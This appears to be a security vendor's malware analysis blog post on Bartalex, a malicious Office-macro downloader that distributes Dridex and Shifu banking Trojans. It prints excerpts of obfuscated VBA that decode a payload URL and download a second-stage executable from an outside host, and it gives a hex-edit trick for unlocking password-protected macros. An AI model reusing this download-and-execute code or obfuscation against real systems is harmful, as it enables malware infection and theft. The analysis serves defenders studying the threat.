King Salemno Greg Leah
Security Threat Analyst Malware Researcher
Bartalex is a name that continues to appear in a cyberthief’s arsenal as one of the most popular mechanisms for distributing banking Trojans, ransomware, RATs, and other malware. The SANS ISC recently published a very interesting technical analysis of Bartalex. With this post, we hope to add a little more color and supplement what you already know about this prolific malware distributor.
Victims of Bartalex (and the later-stage malware Bartalex installs) are infected via Office documents embedded with macros that, when executed, install Bartalex. In older versions of Office, the infection occurs when the document is opened due to a special VBA function called Auto_Open. Newer versions of Office have security settings in place to prevent the auto-execution of such code. Thus, an attacker usually relies on social engineering tricks to make sure the macros still trigger.
The message contained in the body of the document is attempting to social engineer the user into enabling the malicious macros.
Two Styles of Bartalex
Bartalex has two main mechanisms used to deploy the second-stage payload onto the victim’s machine. Let’s look at both:
→ Downloader / Loader
These samples will issue an HTTP GET Request for a remote object. This remote object is the secondary payload usually being hosted on a compromised system. The subsequent infection vector will either be presented as-is (Win32 form) or encoded in some way. Dridex campaigns routinely use the loader method and will download the second-stage in its native form. CryptoWall (ransomware) campaigns will also use the loader technique, however, with a little twist. The second-stage payload in a CryptoWall campaign is usually obfuscated via a XOR cipher (most recently with the key: nkiOaWsg). After receiving the payload, some extra functionality included in Bartalex decodes the payload before execution. This is usually done to thwart anti-virus engines.
Some samples will use a more evasive technique such as embedding the payload in the Office document directly. This payload is then “dropped” or extracted onto the victim’s machine. This is usually less apparent with Excel documents but the size of such files are a rather large indicator. Microsoft Word documents will contain what appears to be several blank pages. However, the pages themselves are not exactly blank but contain the data comprising the payload in question.
Time Complexity Issue
Malware authors (including the creators of Bartalex) utilize the time complexity problem by obfuscating the code found in the document. You will see a series of random characters which appear to be gibberish with the sole purpose of infecting the victim’s machine. This obfuscation is an attempt to make it difficult for an analyst to determine the specific nature and behavior of the code. The longer the analysis time, the longer the campaign runs. The longer the campaign runs, the more the victim tally rises. Even more recently, we have noticed malware authors password protecting the macros, thus preventing a review of the malicious code in question. This greatly increases the time needed for analysis.
In the next section, we will show you a trick to break this time complexity problem into a much more manageable piece.
Breaking Office protected macros
WARNING – The following steps will execute the code and should only be attempted in a safe, isolated analysis environment.
Malware that abuses Office Macros, like Bartalex, will often password-protect macros to prevent analysis by security researchers. In fact, novice analysts will often attempt to brute force the password used for the macro. This is by far one of the most insanely inefficient ways of getting to the source code in question. You are essentially falling prey to the time complexity issue put forth by the attacker. There exists a much easier workaround to immediately break the protection mechanism and save yourself time.
This document contains a password-protected macro.
Open the document in question with a Hex Editor and search for the string “DPB.” Using a live sample, you will see something that appears like the following:
We are merely changing one byte to get this trick to work. Simply change the B in DPB to an X. You should have the following:
At this point, you want to save your changes and exit. You will no longer be needing the hex editor.
At this point, you want to click “Yes” and continue loading the project in question. After loading continues, you may receive an error, which you should just click “OK.”
Now inside the Developer tab, choose “Visual Basic.” It will appear as the left-most icon on the toolbar as shown above.
You will receive an unexpected error. Click “OK” to continue.
Right-click the Project found in the Document and choose “Project Properties.”
Here you just want to uncheck the option “Lock project for viewing” and save the document. Now just go back and attempt to edit the macros and violà! Jackpot!
Dridex Distribution via Bartalex
Dridex has been well documented as one of the most prolific crimeware families in operation today. It is an evolution of the Cridex / Bugat / Feodo / Geodo family with several technical updates. The current evolution of the Dridex family appeared in July 2014 and it is still actively developed and distributed on a daily basis.
A recent arrest of the suspected operator http://www.justice.gov/opa/pr/bugat-botnet-administrator-arrested-and-malware-disabled resulted in a cessation of the botnet operations for an extended period of time. Since then, the botnet is back in action doing almost daily campaigns. In the past week it appears the Dridex gang has stepped up operations with some organizations estimating a 1000-1500 percent increase in distribution.
There are currently two main sub-botnets in use, 120 and 220. They differ in the targeted organization list and distribution. Other botnet identifiers have also been identified including 121 and as recently as November 3rd, 2015, botnet 301.
On November 13, 2015 PhishLabs researchers observed the reemergence of botnet 122, pushing a config targeting a number of U.S. companies where, 120 and 220 have been primarily targeting UK banks.
Dridex is generally distributed by Bartalex as described above: spam emails with a portable document attachment. The attached document contains macros to download the second stage of the malware. This usually requires user interaction to enable macros in the infected document.
[example email with Bartalex infected attachment]
[example Bartalex documents]
When the victim opens the file and enables macros, code similar to the following is executed to download the second stage of the malware.
slash_ro = "\"
dot_ro = Asc(slash_ro) - 46
e_ro = dot_ro + 55
Set pid_kan = CreateObject("Microsoft" + Chr(dot_ro) + "XMLHTTP")
Set pid_mad = CreateObject("Adodb" + Chr(dot_ro) + "Str" + Chr(e_ro) + "am")
Set mid_con = CreateObject("WScript" + Chr(dot_ro) + "Sh" + Chr(e_ro) + "ll").Environment("Proc" + Chr(e_ro) + "ss")
Set pid_did = CreateObject("Sh" + Chr(e_ro) + "ll" + Chr(dot_ro) + "Application")
pid_tro = mid_con("T" + UCase(Chr(e_ro)) + "M" + "P")
pid_tot = pid_tro + slash_ro + "ribasll" + Chr(dot_ro) + "" + Chr(e_ro) + "x" + Chr(e_ro)
Dim solob() As Variant
solob = Array(3433, 3445, 3445, 3441, 3387, 3376, 3376, 3448, 3448, 3448, 3375, 3428, 3426, 3444, 3445, 3430, 3435, 3440, 3439, 3429, 3430, 3447, 3426, 3437, 3429, 3430, 3435, 3426, 3444, 3426, 3375, 3430, 3444, 3376, 3385, 3384, 3450, 3445, 3430, 3382, 3382, 3376, 3383, 3445, 3381, 3382, 3430, 3450, 3447, 3375, 3430, 3449, 3430)
MsgBox (Redistribute(solob, 52))
'pid_kan.Open "G" + "" + UCase(Chr(e_ro)) + "" + "T", Redistribute(solob, 52), pLiveTrades
.Type = 1
.savetofile pid_tot, 2
Function Redistribute(Z() As Variant, oldLen As Integer) As String
Dim n As Integer
For n = LBound(Z) To UBound(Z)
Redistribute = Redistribute & Chr(Z(n) - 13 * oldLen - 2653)
The above is a sample of macro code extracted from a recent Dridex campaign (2015.11.10). The code was isolated from around 800 lines of seemingly benign VBA code. The technique of hiding malicious code in between lines of benign code is a classic technique used by malware authors. We have extracted a subset of the malicious code to illustrate the download-and-execute routine.
The extracted code essentially does the following, which is typical for a Bartalex:
* Create a Microsoft.XMLHTTP object
* Create a Adodb.Stream object
* Create a WScript.Shell.Enviroment( "Process" ) object
* Create a Shell.Application object
* Allocate an array with the obfuscated payload URL
* Define a deobfuscation funciton
* Download and execute the second stage payload using the above objects
The payload URL is encoded in the solob() Array in the above code. When decoded, the Dridex payload is revealed to be located at the following web address: hXXp:// www.castejondevaldejasa[.]es/87yte55/6t45eyv.exe. This payload was the loader for a Dridex botnet 220 sample.
Shiz/Shifu Observed Being Pushed by Bartalex
Shifu malware has also been observed using the same distribution techniques. Shifu, which was first discovered in January of this year, targets mainly Japanese and UK banks. Shifu is characterized as utilizing many anti-analysis and anti-vm-techniques to thwart automated analysis by researchers. Shifu uses a domain generation algorithm (DGA) to programmatically determine the current list of C&C addresses to connect to.
On October 20, a campaign was observed distributing Shifu using the same booby-trapped macro documents seen in recent Dridex campaigns. For comparison, here is a snippet of code from one of the excel documents:
Email lure with Shifu Attachment
Dim computer() As Variant
computer = Array(149, 159, 157, 151, 95, 82, 80, 143, 126, 139, 136, 140, 136, 120, 124, 61, 120, 129, 106, 115, 110, 119, 111, 100, 43, 94, 115, 38, 43, 40, 39, 35, 35, 32, 24, 75, 26, 25, 24, 23, 69, 20, 7, 60, 77, 56)
On Error Resume Next
httpRequest.Open "GE" + "T", GetStringFromArray(computer, 45), False
This code is very similar to the code distributing the older Dridex malware family.
Variants and Future Expectations
Bartalex has seen a couple of variants in the recent past. Loaders downloading a text-file containing a single URL which points to the actual payload (which we have aptly named the 'payload pointer' file). However, although old tricks, malware authors are simply using trusted and tried techniques that still work. As malware analysts and anti-virus companies play cat and mouse in an effort to level the playing field, we will continue to see various alterations to dear old Bartalex until it presents a stalemate which makes such a distribution instrument no longer feasible. PhishLabs has monitored the evolution of Bartalex, its' payloads as well as the intended targets for some time. Is Microsoft Office important in your organization? Please remember that a daily operational tool such as a word processor can still be the malicious vector that can gravely impact your business.
If you are still concerned about the likes of Bartalex or other malware authors, our team is always here to tell you how we can help mitigate as well as prevent future infections to your company.